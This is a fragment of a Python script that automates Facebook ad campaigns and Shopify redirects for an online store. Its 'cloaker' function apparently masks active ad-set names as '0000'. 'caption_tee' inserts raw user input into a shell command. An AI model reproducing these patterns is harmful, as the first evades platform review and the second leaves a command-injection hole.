'1400px'; e = x.getElementsByClassName('_3pzk'); f = e[1]; f.style.width = '241px'; f.style.left = '241px';")
time.sleep(0.2)
def adsFeed(self, date_range=100, bd=True, filters=None):
print("FEEDING ADSETS")
self.ff = Browser()("sele", window_index=[0,0,4,4])
url = format_url(self, date_range, bd, filters)
self.ff.get(url)
self.ff.fcss('._2a2d').click(); zz(6)
try: adms = CSV().DictRead(time_a_download(method=self.ff.ffs('button','action','confirm').click))
except: adms = CSV().DictRead(time_a_download(method=self.ff.fcn('layerConfirm').click))
print('adms: %s'%adms)
if 'No data available' in str(adms):
print("no adsets")
return []
adms = [i for i in adms if i['Ad Set ID'] != '' and i['Ad Set Name'] != None and 'DPA' not in i['Ad Set Name']]
for adm in adms:
for a in adm:
if adm[a] == '' or adm[a] == None:
adm[a] = 0
# adm['data'] = eval(adm['Ad Set Name'])
adm['spent'] = float(adm['Amount Spent (USD)'])
adm['pcv'] = float(adm['Website Purchases Conversion Value'])
adm['pcs'] = float(adm['Website Purchases'])
adm['cpc'] = float(adm['CPC (Cost per Link Click) (USD)'])
adm['clicks'] = float(adm['Link Clicks'])
adm['roi'] = float(adm['pcv']) / float(adm['spent']) if adm['spent'] != 0 else 0
"""
print("...feedAudience...")
for x in Audience.objects.all():
x.pcs = 0
x.roi = 0
x.spent = 0.01
x.pcv = 0
matching_audiences = [i for i in adms if i['data']['audname'] == x.name]
x.pcs += sum(key(matching_audiences, 'pcs'))
x.spent += sum(key(matching_audiences, 'spent'))
x.pcv += sum(key(matching_audiences, 'pcv'))
x.roi += x.pcv / x.spent
x.save()
print("...feedProduct...")
for x in Product.objects.all():
x.pcs = 0
x.roi = 0
x.spent = 0.01
x.pcv = 0
x.pcs = sum([i['pcs'] for i in adms if i['data']['handle'] == x.handle])
x.spent += sum([i['spent'] for i in adms if i['data']['handle'] == x.handle])
x.pcv = sum([i['pcv'] for i in adms if i['data']['handle'] == x.handle])
x.roi = x.pcv / x.spent
print(x.pcs, x.spent, x.pcv, x.roi)
x.save()
"""
self.adms = adms
self.ff.quit()
return self.adms
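# Builds a bulk-import spreadsheet of ad sets from the rows of products.csv flagged
# "advertise?" == "TRUE": it resolves each row's Shopify product and variant image, fills a
# copy of BASE_ADSET_DICTIONARY per row, writes ~/tmp.csv and then imports the file (plus
# the downloaded images) through the Ads Manager spreadsheet-import dialog.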
def advertise():
storeabbre = input("what store abbre?: ")
shop = Shop()( storeabbre)
BASE_ADSET_DICTIONARY = {'Ad ID': '','Ad Name': 'test','Ad Set Daily Budget': '5','Ad Set ID': '','Ad Set Lifetime Budget': '0','Ad Set Lifetime Impressions': '0','Ad Set Name': 'test','Ad Set Run Status': 'ACTIVE','Ad Set Schedule': '','Ad Set Time Start': '%s 2:00:00 am' % Date().dt(1, '%m/%d/%Y'),'Ad Set Time Stop': '','Ad Status': 'ACTIVE','Add End Card': '','Additional Custom Tracking Specs': '[]','Addresses': '','Age Max': '65','Age Min': '18','Android App Name': '','Android Package Name': '','App Destination': '','Application ID': '','Attribution Spec': '[{"event_type":"CLICK_THROUGH","window_days":7},{"event_type":"VIEW_THROUGH","window_days":1}]','Audience Network Positions': 'classic','Automatically Set Bid': 'Yes','Behaviors': '','Bid Amount': '','Billing Event': 'IMPRESSIONS','Body': '','Broad Category Clusters': '','Buying Type': 'AUCTION','Call to Action': '','Call to Action Link': '','Campaign ID': '','Campaign KPI': '','Campaign KPI Custom Conversion ID': '','Campaign Name': 'test','Campaign Objective': 'Conversions','Campaign Page ID': '','Campaign Spend Limit': '','Campaign Status': 'ACTIVE','Cities': '','College End Year': '','College Start Year': '','Connections': '','Conversion Tracking Pixels': 'tp:141019342913259','Countries': 'US','Creative Optimization': '','Creative Type': 'Photo Page Post Ad','Custom Audiences': '','Deep Link For Android': '','Deep Link For Windows Phone': '','Deep Link For iOS': '','Deep Link For iPad': '','Deep Link For iPhone': '','Deep link to website': '','Destination Type': 'UNDEFINED','Device Platforms': 'mobile, desktop','Display Link': '','Dynamic Ad Voice': '','Education Schools': '','Education Status': '','Electoral Districts': '','Event ID': '','Excluded Addresses': '','Excluded Cities': '','Excluded Connections': '','Excluded Countries': '','Excluded Custom Audiences': '','Excluded Electoral Districts': '','Excluded Geo Markets (DMA)': '','Excluded Global Regions': '','Excluded Product Audience Specs': '','Excluded Publisher Categories': '','Excluded Regions': '','Excluded User AdClusters': '','Excluded User Device': '','Excluded Zip': '','Facebook App ID': '','Facebook Positions': 'feed, right_hand_column','Family Statuses': '','Fields of Study': '','Flexible Exclusions': '','Flexible Inclusions': '[{"interests":[{"id":"6003324061606","name":"Audrey Hepburn"},{"id":"6003347600674","name":"Katharine Hepburn"},{"id":"6003392991271","name":"Rockabilly"},{"id":"6011957502962","name":"www.rockabilly-clothing.de"},{"id":"6013806088087","name":"Viva Las Vegas Rockabilly Weekend"}]}]','Force Single Link': '','Frequency Control': '','Friends of Connections': '','Gender': '','Generation': '','Geo Markets (DMA)': '','Global Regions': '','Home Ownership': '','Home Type': '','Home Value': '','Household Composition': '','Image': '83824348246.jpg','Image Crops': '','Image Hash': '','Image Overlay Float With Margin': '','Image Overlay Position': '','Image Overlay Template': '','Image Overlay Text Font': '','Image Overlay Text Type': '','Image Overlay Theme Color': '','Income': '','Industries': '','Instagram Account ID': '','Instagram Platform Image Crops': '','Instagram Platform Image Hash': '','Instagram Platform Image URL': '','Instagram Positions': '','Instagram Preview Link': '','Interested In': '','Lead Form ID': '','Life Events': '','Link': 'https://www.facebook.com/steampunkstop/photos/p.1998717263718262/1998717263718262/?type=3','Link Description': 'Auxiliary. 
We’ve Scourged Hotspots Of The Earth Mercilessly With Grandiose Detectors And Finally Our SteamBots Have Enchanted The Auxiliary Dress With Magnetic Seals To Affix Protection Spirits To It Permanently.\nClick Below 👇\nsteampunkstop.com/auxiliary','Link Object ID': 'o:1669573053299353','Locales': '','Location Types': 'home, recent','Messenger Positions': '','Mobile App Deep Link': '','Moms': '','Multicultural Affinity': '','Net Worth': '','Object Store URL': '','Offer ID': '','Office Type': '','Optimization Goal': 'OFFSITE_CONVERSIONS','Optimized Conversion Tracking Pixels': 'tp:141019342913259','Optimized Custom Conversion ID': '','Optimized Event': 'PURCHASE','Optimized Pixel Rule': '','Page Welcome Message': '','Permalink': 'https://business.facebook.com/1669573053299353/posts/1998717263718262?business_id=560484760766872','Place Page Set ID': '','Politics': '','Post Click Item Description': '','Post Click Item Headline': '','Preview Link': 'https://www.facebook.com/?feed_demo_ad=6095601486324&h=AQDKS_Ci6KEDEOCa','Product 1 - Description': '','Product 1 - Display Link': '','Product 1 - Image Crops': '','Product 1 - Image Hash': '','Product 1 - Is Static Card': '','Product 1 - Link': '','Product 1 - Mobile App Deep Link': '','Product 1 - Name': '','Product 1 - Place Data': '','Product 1 - Video ID': '','Product 10 - Description': '','Product 10 - Display Link': '','Product 10 - Image Crops': '','Product 10 - Image Hash': '','Product 10 - Is Static Card': '','Product 10 - Link': '','Product 10 - Mobile App Deep Link': '','Product 10 - Name': '','Product 10 - Place Data': '','Product 10 - Video ID': '','Product 2 - Description': '','Product 2 - Display Link': '','Product 2 - Image Crops': '','Product 2 - Image Hash': '','Product 2 - Is Static Card': '','Product 2 - Link': '','Product 2 - Mobile App Deep Link': '','Product 2 - Name': '','Product 2 - Place Data': '','Product 2 - Video ID': '','Product 3 - Description': '','Product 3 - Display Link': '','Product 3 - Image Crops': '','Product 3 - Image Hash': '','Product 3 - Is Static Card': '','Product 3 - Link': '','Product 3 - Mobile App Deep Link': '','Product 3 - Name': '','Product 3 - Place Data': '','Product 3 - Video ID': '','Product 4 - Description': '','Product 4 - Display Link': '','Product 4 - Image Crops': '','Product 4 - Image Hash': '','Product 4 - Is Static Card': '','Product 4 - Link': '','Product 4 - Mobile App Deep Link': '','Product 4 - Name': '','Product 4 - Place Data': '','Product 4 - Video ID': '','Product 5 - Description': '','Product 5 - Display Link': '','Product 5 - Image Crops': '','Product 5 - Image Hash': '','Product 5 - Is Static Card': '','Product 5 - Link': '','Product 5 - Mobile App Deep Link': '','Product 5 - Name': '','Product 5 - Place Data': '','Product 5 - Video ID': '','Product 6 - Description': '','Product 6 - Display Link': '','Product 6 - Image Crops': '','Product 6 - Image Hash': '','Product 6 - Is Static Card': '','Product 6 - Link': '','Product 6 - Mobile App Deep Link': '','Product 6 - Name': '','Product 6 - Place Data': '','Product 6 - Video ID': '','Product 7 - Description': '','Product 7 - Display Link': '','Product 7 - Image Crops': '','Product 7 - Image Hash': '','Product 7 - Is Static Card': '','Product 7 - Link': '','Product 7 - Mobile App Deep Link': '','Product 7 - Name': '','Product 7 - Place Data': '','Product 7 - Video ID': '','Product 8 - Description': '','Product 8 - Display Link': '','Product 8 - Image Crops': '','Product 8 - Image Hash': '','Product 8 - Is Static Card': '','Product 
8 - Link': '','Product 8 - Mobile App Deep Link': '','Product 8 - Name': '','Product 8 - Place Data': '','Product 8 - Video ID': '','Product 9 - Description': '','Product 9 - Display Link': '','Product 9 - Image Crops': '','Product 9 - Image Hash': '','Product 9 - Is Static Card': '','Product 9 - Link': '','Product 9 - Mobile App Deep Link': '','Product 9 - Name': '','Product 9 - Place Data': '','Product 9 - Video ID': '','Product Audience Specs': '','Product Catalog ID': '','Product Link': '','Product Set ID': '','Publisher Platforms': 'facebook, audience_network','Rate Card': '','Regions': '','Relationship': '','Retailer IDs': '','Site Category': '','Story ID': '','Tags': '','Targeted Business Locations': '','Targeting Categories - ALL OF': '','Targeting Optimization': '','Template URL': '','Title': '','URL Tags': '','Unified Interests': '','Use Accelerated Delivery': 'No','Use Average Bid': 'No','Use Page as Actor': 'No','User Device': '','User OS Version': '','User Operating System': '','Video ID': '','Video Retargeting': 'No','Video Thumbnail URL': '','Windows App Name': '','Windows Store ID': '','Wireless Carrier': '','Work Employers': '','Work Job Titles': '','Zip': '','iOS App Name': '','iOS App Store ID': '','iPad App Name': '','iPad App Store ID': '','iPhone App Name': '','iPhone App Store ID': ''}
DICTIONARYS_FOR_CSV = []
products_csv=os.path.expanduser('~/tavern/tavern/products.csv')
PRODUCTS_ROWS_DICTIONARYS = CSV().DictRead(products_csv)
products = productsFeed(shop)
FULL_EXTENSION_FILENAMES = []
for ROW in PRODUCTS_ROWS_DICTIONARYS:
if ROW["advertise?"] == "TRUE":
p = [i for i in products if i["title"] == ROW["title"]][-1]
p = shop.shopify.Product.find(id_=p['id'])
caption = create_caption(p, shop, ROW['caption'], ROW["shopify_url"])
NEW_DATA = copy.deepcopy(BASE_ADSET_DICTIONARY)
NEW_DATA["Flexible Inclusions"] = ""
NEW_DATA['Campaign Name'] = p.handle
NEW_DATA['Ad Set Name'] = caption.replace("\n", " ")
NEW_DATA['Ad Name'] = NEW_DATA['Ad Set Name']
NEW_DATA['Display Link'] = caption
NEW_DATA['Title'] = caption
NEW_DATA['Body'] = caption
NEW_DATA['Post Click Item Headline'] = caption
NEW_DATA['Description'] = caption
try:
variant_id = int(ROW["shopify_url"].split("variant=")[-1])
print("variant id: %s" )
############ FINDING MATCHING IMAGE FROM PRODUCT IMAGES BASED ON VARIANT ID
img_id = None
for i in p.variants:
if i.id == variant_id:
img_id = i.image_id
print("Found matching img_id to URL %s" % url)
variant_src = None
for i in p.images:
if i.id == img_id:
variant_src = i.src
print("Found matching variant_id to img_id.. %s" % variant_src)
fn = None
if variant_src is not None:
fn = Images().download_and_resize(variant_src, 1200)
if img_id is None: # this is in the case its a "1 Title Product"
fn = Images().download_and_resize(p.image.src, 1200)
print("image filename for the variant: %s" % fn)
FULL_EXTENSION_FILENAMES.append(fn)
NEW_DATA['Image'] = fn.split('/')[-1]
pprint(NEW_DATA)
DICTIONARYS_FOR_CSV.append(NEW_DATA)
except Exception as e:
print("error with possibly probably - the product has 0 variants and thus variantless URL, error:\n%s"% e )
tmp_file = os.path.expanduser("~/tmp.csv")
CSV().DictWrite(tmp_file, DICTIONARYS_FOR_CSV)
ss = Browser()("sele")
if not Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Manager_ID:
Update(Get(Shop,shop_abbreviation=Muta()().store_abbre),Facebook_Business_Manager_ID=OSA.log("Enter in the Facebook Business Manager ID. You can usually find it in the url like business_id=<Business ID>."))
ss.get("https://business.facebook.com/ads/manage/powereditor/manage/campaigns?act={}&business_id={}&columns=start_time%2Ccampaign_group_name%2Cname%2Ccampaign_id%2Cimpressions%2Cfrequency%2Ccpm%2Cclicks%2Cctr%2Cactions%3Alink_click%2Ccost_per_action_type%3Alink_click%2Cspend%2Caction_values%3Aoffsite_conversion.fb_pixel_purchase%2Cactions%3Aoffsite_conversion.fb_pixel_purchase%2Ccost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase%2Cactions%3Aoffsite_conversion.checkout%2Ccost_per_action_type%3Aoffsite_conversion.checkout%2Cbudget%2Crelevance_score%3Ascore%2Cwebsite_purchase_roas%3Aoffsite_conversion.fb_pixel_purchase&attribution_windows=default&date=2005-02-01_2017-12-31%2Clifetime".format(Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Ad_Account_ID, Get(Shop,shop_abbreviation=Muta()().store_abbre).Facebook_Business_Manager_ID))
#""" # OLD WITH FIREFOX
try:
ss.ffs('button','data-tooltip-content','Create & Edit in a Spreadsheet').click()
except:
ss.ffs('button','data-tooltip-content','Export & import').click()
ss.ffss('li','role','presentation')[-2].click()
ss.ffs('input','data-testid','import-paste-text-link').send_keys(tmp_file)
IMAGE_UPLOAD_BUTTON = ss.ffs('input','accept','image/jpg, image/jpeg, image/gif, image/bmp, image/png, image/tiff, image/tif')
for x in FULL_EXTENSION_FILENAMES:
IMAGE_UPLOAD_BUTTON.send_keys(x)
ss.ffs('button','data-testid','import-button').click()
#"""
while True:
if "Your import is complete" in ss.page_source:
time.sleep(3)
break
ss.quit()
# advertise(url, p, caption)
def alter_redirect(shop_abbreviation, previous_path, new_path, new_target):
redirects = get_redirects(Shop()(shop_abbreviation))
redirect = [i for i in redirects if i.path == previous_path][0]
redirect.path = new_path
redirect.target = new_target
assert True == redirect.save()
assert requests.get("%s%s"%(Shop()(shop_abbreviation).Domain_Name,new_path)).url==new_target
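# Usage sketch (hypothetical values; assumes the shop abbreviation and the previous redirect path already exist in Shopify):
#   alter_redirect("xyz", "/old-sale", "/new-sale", "https://example.com/products/new-sale")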
def caption_tee():
caption_to_tee = multi_input("caption to tee: ")
os.system("echo '============================\n%s\n\n============================' | tee -a ./.teed_captions.txt" % caption_to_tee)
def check_remaining():
page_name = OSA.log("Page name?")
OSA.log("%s"%(len(get_scheduled_posts(page_name))))
def cloaker(io=None, direction=None):
""" ::: Initiate Shop ::: """
a_shop()
""" ::: If you use July_Adset_Utilities to update all adset targeting data, to ::: """
""" ::: Get the most accurate adset effective_status data, it's the same as ::: """
""" ::: requesting all adset_ids in database, checking if active status, (to change adset name)::: """
""" ::: So here I update adset targeting data ///actually at direction==1.\\\::: """
if direction == 0:
import builtins
if type(io) == builtins.dict:
for adset_id,adset_name in io.items():
AdSet(adset_id).remote_update(params={"name":adset_name})
magentaprint(AdSet(adset_id).remote_read(fields=["name"])._json)
elif direction == 1:
July_Adset_Utilities().update_adset_targeting_data()
dict = {}
for adset in Filter(Adset,status="ACTIVE"):
name = None
try:
name = AdSet(adset.adset_id).remote_read(fields=["name"])._json["name"]
except Exception as e:
redprint(e)
continue
redprint(adset.adset_id, name)
dict[adset.adset_id] = name
AdSet(adset.adset_id).remote_update(params={"name":"0000"})
return dict
def createCreative(shop, fn, fb_page_id, caption):
image = AdImage(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
image[AdImage.Field.filename] = fn
image.remote_create()
# Output image Hash
print("hash: %s" % image[AdImage.Field.hash])
photo_data = AdCreativePhotoData()
photo_data['image_hash'] = image['hash']
photo_data['caption'] = caption
object_story_spec = AdCreativeObjectStorySpec()
object_story_spec[AdCreativeObjectStorySpec.Field.page_id] = fb_page_id
object_story_spec[AdCreativeObjectStorySpec.Field.photo_data] = photo_data
creative = AdCreative(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
creative[AdCreative.Field.name] = 'AdCreative %s' % random.randrange(0, 10**10)
creative[AdCreative.Field.object_story_spec] = object_story_spec
creative.remote_create()
print(creative)
return creative
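# Usage sketch (hypothetical values; `shop` is assumed to expose Facebook_Business_Ad_Account_ID
# and `fn` to be a local image path):
#   creative = createCreative(shop, "/tmp/variant.jpg", fb_page_id="123456789", caption="New arrival")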
def create_ad(product=None,variant_id=None,store_abbre=None,niche=None,page=None,caption=None):
short_url = create_redirect(Shop()(Muta()().store_abbre), path=("/%s"%(get_handle_from_title(product.title))), target=("%s/products/%s%s"%(Shop()(Muta()().store_abbre).Domain_Name,get_handle_from_title(product.title),("?variant=%s"%(or_list(variant_id,product.variants[0].id)) ))))
# OSA.log("C")
caption = caption.replace("<redirect_url>",short_url)
# OSA.log("D")
url = None
if variant_id == None:
url = product.images[0].src
else:
# OSA.log("%s %s"%(variant_id,type(product)))
# variant = [i for i in product.variants if i.id == variant_id][0]
# variant_image_id = variant.image_id
# image = [i for i in product.images if i.id == variant_image_id][0]
# image_src = image.src
# if image_src == None:
# # 1
# image_src = product.images[0].src
image_src = or_list(lambda:[j.src for j in product.images if j.id == [i for i in product.variants if i.id == variant_id][0].image_id][0],lambda:product.images[0].src) # match the variant's image_id to an image src (the intent of the commented-out code above), falling back to the first product image
url = image_src
campaign_id, adset_id = AdsetCreater()(fbid=Shop()(Muta()().store_abbre).Facebook_Business_Ad_Account_ID,url=url,caption=caption,page_id=[i for i in get_pages() if i["name"] == Muta()().page][0]["id"],interest_ids=[])
# OSA.log("E")
Save(Adset, campaign_id=campaign_id, adset_id=adset_id, ad_account_id=Shop()(Muta()().store_abbre).Facebook_Business_Ad_Account_ID, is_created=True, handle=product.handle, niche=Muta()().niche, shop_abbreviation=Muta()().store_abbre, facebook_page=Muta()().page, product_url=short_url, image_url=product.images[0].src, caption=caption, interest_ids=[])
# OSA.log("F")
Update(product,adset_id=adset_id)
# OSA.log("G")
# OSA.log(str(adset_id))
July_Adset_Utilities().update_advertisement_all(adset_id)
# OSA.log("H")
pool(lambda:OSA().log("adset created",tp=False))
def create_redirect(shop, path, target):
path = path.lower().strip()
target = target.lower().strip()
redirect = shop.shopify.Redirect()
# redirects = sum([shop.shopify.Redirect.find(status="any", limit=250, page=i) for i in range(1,10)],[])
redirects = shop.shopify.Redirect.find(path=path)
if path in key("path", redirects):
x = [i for i in redirects if i.path == path]
redirect = x[0]
print("changing existing redirect of %s to %s"% (redirect.target, target))
redirect.path = path
redirect.target = target
if not redirect.target.startswith("https://"): redirect.target = "https://%s"%redirect.target
# [3/28/19] https:// required
assert True == redirect.save()
distinct_print("%s -----> %s" % (redirect.path, redirect.target))
x = (shop.Domain_Name + redirect.path).replace("https://","").replace("http://","")
return x
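# Usage sketch (hypothetical values; assuming shop.Domain_Name == "https://example.com"):
#   create_redirect(shop, "/wall-decal", "https://example.com/products/wall-decal?variant=123")
#   -> "example.com/wall-decal" (the returned short URL has the scheme stripped)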
def export_a_video():
shop, handle = OSA.log("Please enter the shop abbreviation and handle, separated by ', ', [for example: xyz, wall-decal]").split(", ")
export_address = OSA.log("Please enter the address to export the video to [for example: /Users/user/video.mp4]")
product = Get(Product,shop=shop,handle=handle)
video = Get(Video,product_id = product.id)
open(export_address,"wb").write(video.video)
def format_url(self, date_range, bd, filters):
dates = '&date=%s_%s' % (Date().dt(date_range*-1), Date().dt(0))
day_bd_url = 'https://business.facebook.com/ads/manager/account/adsets/?act='+self.Facebook_Business_Ad_Account_ID+dates+'&time_breakdown=days_1&columns=["start_time"%2C"campaign_group_name"%2C"name"%2C"campaign_id"%2C"impressions"%2C"frequency"%2C"cpm"%2C"clicks"%2C"ctr"%2C"actions%3Alink_click"%2C"cost_per_action_type%3Alink_click"%2C"spend"%2C"action_values%3Aoffsite_conversion.fb_pixel_purchase"%2C"actions%3Aoffsite_conversion.fb_pixel_purchase"%2C"cost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase"%2C"actions%3Aoffsite_conversion.checkout"%2C"cost_per_action_type%3Aoffsite_conversion.checkout"%2C"budget"%2C"relevance_score%3Ascore"]&sort=cost_per_action_type%3Aoffsite_conversion.fb_pixel_purchase~1|delivery_info~1|spent~0|start_time~0&pid=p1'
if bd==False:
day_bd_url = day_bd_url.replace('&time_breakdown=days_1', '')
if filters == 'paused':
day_bd_url += '&filter_set=[{%22field%22%3A%22campaign.delivery_info%22%2C%22operator%22%3A%22IN%22%2C%22value%22%3A[%22inactive%22]}]'
if filters == 'active':
day_bd_url += '&filter_set=[{%22field%22%3A%22campaign.delivery_info%22%2C%22operator%22%3A%22IN%22%2C%22value%22%3A[%22active%22%2C%22limited%22]}]'
return day_bd_url
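# Notes on format_url (a sketch of the expected arguments): `self` is assumed to be an object exposing
# Facebook_Business_Ad_Account_ID (e.g. a Shop); `date_range` is the number of days back from today;
# bd=False strips the daily time breakdown; filters may be 'paused' or 'active' to append the matching
# delivery_info filter_set. Hypothetical call:
#   url = format_url(shop, date_range=7, bd=True, filters='active')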
def gen_adset_name(niche,audname,handle,budget) :
return str(OrderedDict([('niche',niche), ('audname',audname), ('handle',handle),
('budget',budget) ]))
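# Example output (values hypothetical): gen_adset_name("decor", "broad", "wall-decal", 500) returns the
# string form of an OrderedDict, e.g.
# "OrderedDict([('niche', 'decor'), ('audname', 'broad'), ('handle', 'wall-decal'), ('budget', 500)])"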
def get_next_scheduled_time(page,scheduled_posts):
times_to_schedule = page.publish_times
max_scheduled_time = or_list(lambda:max(sud("scheduled_publish_time",scheduled_posts)),lambda:Date()().replace(hour=times_to_schedule[-1]))
max_scheduled_time_hour = max_scheduled_time.hour
max_scheduled_time_date = max_scheduled_time
max_scheduled_time_second = max_scheduled_time.second
latest = times_to_schedule[-1]
next_scheduled_time_hour = None
next_scheduled_time_date = None
if max_scheduled_time_hour == latest:
next_scheduled_time_hour = times_to_schedule[0]
else:
index = times_to_schedule.index(max_scheduled_time_hour)
next_index = index + 1
next_scheduled_time_hour = times_to_schedule[next_index]
if max_scheduled_time_hour == latest:
next_scheduled_time_date = (Date(max_scheduled_time_date)+1)()
else:
next_scheduled_time_date = Date(max_scheduled_time_date)()
next_scheduled_time = next_scheduled_time_date.replace(hour=next_scheduled_time_hour,second=max_scheduled_time_second)
next_scheduled_time_timestamp = int(timestamp(next_scheduled_time))
return next_scheduled_time_timestamp
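# Worked example (assuming page.publish_times == [14, 19], the default set in get_pages below): if the
# latest scheduled post is at hour 19, the next slot is hour 14 on the following day; if it is at hour 14,
# the next slot is hour 19 on the same day. The result is returned as a unix timestamp via timestamp().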
def get_next_scheduled_times(page,publish_times,start_date,count):
all_data = []
page = Get(Facebookpage,name=page)
start_idx = 0
for i in range(count):
new = start_date.replace(hour=publish_times[start_idx])
start_idx = start_idx + 1
if start_idx+1 > len(publish_times):
start_idx = 0
start_date = start_date + timedelta(days=1)
all_data.append(new)
return all_data
def get_pages():
Shop()(All(Shop)[0].shop_abbreviation) # set the api
user = get_user()
pages = keycall("export_all_data", user.get_accounts(params={"limit":5000}))
[tryprocess(Facebookpage(facebook_id=i["id"],name=i["name"],url="https://facebook.com/%s"%i["id"]).save,) for i in pages]
[Update(Get(Facebookpage,facebook_id=i["id"]),token=i["access_token"]) for i in pages]
[Update(Get(Facebookpage,facebook_id=i["id"]),publish_times = [14,19]) for i in pages]
[Del(i) for i in All(Facebookpage) if i.name not in sud("name",pages)]
return pages
def get_post_reactions(page_name, post_id):
page = Get(Facebookpage, name = page_name)
url = "https://graph.facebook.com/%s/reactions"%(post_id)
token = page.token
params = {"access_token":token, "fields":["total_count"],"summary":"total_count"}
r = requests.get(url, params = params)
data = json.loads(r.text)
total_count = data["summary"]["total_count"]
return total_count
def get_posted_posts(page_name):
page = Get(Facebookpage, name = page_name)
facebook_id = page.facebook_id
url = "https://graph.facebook.com/%s/feed"%(facebook_id)
token = page.token
params = {"access_token":token, "fields":["created_time","message","id"], "limit":100}
r = requests.get(url, params = params)
all_data = []
data = json.loads(r.text)["data"]
all_data.extend(data)
response = json.loads(r.text)
while "next" in response.get("paging",[]):
next_url = response["paging"]["next"]
r = requests.get(next_url)
response = json.loads(r.text)
data = json.loads(r.text)["data"]
all_data.extend(data)
return all_data
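# Note: get_posted_posts (and get_scheduled_posts below) follow the Graph API cursor pagination pattern:
# keep requesting response["paging"]["next"] until the "paging" block no longer has a "next" URL,
# accumulating each page's "data" list.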
def get_promoted_object():
promoted_object = { "custom_event_type": "PURCHASE", "pixel_id": str(Shop()(adset_to_create.shop_abbreviation).Facebook_Pixel_ID), "pixel_rule": "{\"event\":{\"eq\":\"Purchase\"}}" }
return promoted_object
def get_redirect_from_ad_copy(ad_copy):
return re.findall(r"[:/a-zA-Z0-9]+\.[/a-zA-Z0-9-]+", ad_copy)
def get_redirects(shop):
redirects = sum([shop.shopify.Redirect.find(status="any", limit=250, page=i) for i in range(1,10)],[])
return redirects
def get_scheduled_posts(page_name):
page = Get(Facebookpage, name = page_name)
facebook_id = page.facebook_id
url = "https://graph.facebook.com/%s/scheduled_posts"%(facebook_id)
token = page.token
params = {"access_token":token, "fields":["scheduled_publish_time"], "limit":100}
r = requests.get(url, params = params)
all_data = []
data = json.loads(r.text)["data"]
all_data.extend(data)
response = json.loads(r.text)
while "next" in response.get("paging",[]):
next_url = response["paging"]["next"]
r = requests.get(next_url)
response = json.loads(r.text)
data = json.loads(r.text)["data"]
all_data.extend(data)
[setitem(i,"scheduled_publish_time",timestamp(i["scheduled_publish_time"],False)) for i in all_data]
return all_data
def get_url_from_body(x):
return getitem(re.findall(".*/.*",x),0,"None").split(" ")[-1]
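# Example (assuming getitem(lst, 0, "None") returns the first element or the default): for the ad copy
# above, get_url_from_body("Click Below\nsteampunkstop.com/auxiliary") -> "steampunkstop.com/auxiliary",
# i.e. the last space-separated token of the first line that contains a "/".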
def get_user():
a_shop()
from facebookads.adobjects.user import User
api = FacebookAdsApi.init(app_id=a_shop().Facebook_Business_App_ID,app_secret=a_shop().Facebook_Business_App_Secret,access_token=a_shop().Facebook_Business_App_Token)
return User(fbid="me", api=api)
def print_sorted_audiences():
auds = Audience.objects.all()
auds = keysort('pcs', auds, tcer=True)
CSV().csvprint(auds, colnames=['pcs','roi','spent','pcv', 'name', 'niche', 'id'])
def print_targeting_data(data):
print("Targeting DATA for adset:\n\
1. Age Min: %s\n\
2. Age Max: %s\n\
3. Gender: %s\n\
4. Pixel Goals: %s\n\
5. Attribution Spec: %s\n\
6. Device Platforms: %s\n\
7. Publisher Platforms: %s\n\
8. Targeting Optimization: %s\n"%(data['targeting']['age_min'], data['targeting']['age_max'],
data['targeting']['genders'], data['promoted_object']['custom_event_type'],
data['attribution_spec'][0]['window_days'], data['targeting']['device_platforms'],
data['targeting']['publisher_platforms'], data['targeting']['targeting_optimization']))
def run():
products_csv=os.path.expanduser('~/tavern/tavern/products.csv')
data = CSV().DictRead(products_csv)
shop = Shop()(All(Shop)[0].shop_abbreviation)
# dicts = []
for i in data:
if i['added'] == "FAILED":
products = productsFeed(shop)
for j in products:
if j.title == i['title']:
j.delete()
if i['added'] == 'FALSE':
p = Aliexpress_Products().create_product(i['url'].split('?')[0], i['niche'], i['item_type'], i['title'], i['description'])
input("Adjust Images, State / Add to Body - ")
url = input("Input URL: ")
p = shop.shopify.Product.find(id_=p.id)
caption = create_caption(p, shop, i['caption'], url)
advertise(url, p, caption)
print("Added items \n\n")
def s():
a_shop()
def t_format_ids(ids):
return [{"interests": [{'id':i} for i in ids]}]
def t_format_resp(resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def t_reach_estimate(shop, ids=None):
account = AdAccount('act_%s'%shop.Facebook_Business_Ad_Account_ID)
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
# added this 2nd t_spec in as this is how based on 10/2018 targeting was by default
t_spec = {'age_max': 65,
'age_min': 18,
#'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile'],
'facebook_positions': ['feed'],
'geo_locations': {'countries': ['US'],},
'publisher_platforms': ['facebook'],
'targeting_optimization': 'none',
'flexible_spec': []
}
if ids:
t_spec['flexible_spec'] = t_format_ids(ids)
params = {
#'currency': 'USD',
#'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
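# Usage sketch (hypothetical interest id): t_reach_estimate(shop, ids=[6003123456789]) returns the
# estimated audience size ("users") for the second t_spec above, restricted to that interest.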
def t_search(q,limit=10000):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':limit})
return t_format_resp(resp)
def t_suggestion(names):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':10000})
return t_format_resp(resp)
def update_adset_names_from_body_url():
a_shop()
for adset in Adset.objects.filter(is_created=True):
url = get_url_from_body(adset.body)
if "bit.ly" in url:
url = requests.get(url).url.replace("/products","")
x = AdSet(adset.adset_id)
x.remote_read(fields=["name", "daily_budget", "targeting"])
#name = url
#name = "%s , %s" % (x["daily_budget"], url)
name = "US %s-%s"%(x["targeting"]["age_min"], x["targeting"]["age_max"])
if x["name"] != name:
ad = x.get_ads()[0]
x.remote_update(params={"name":name})
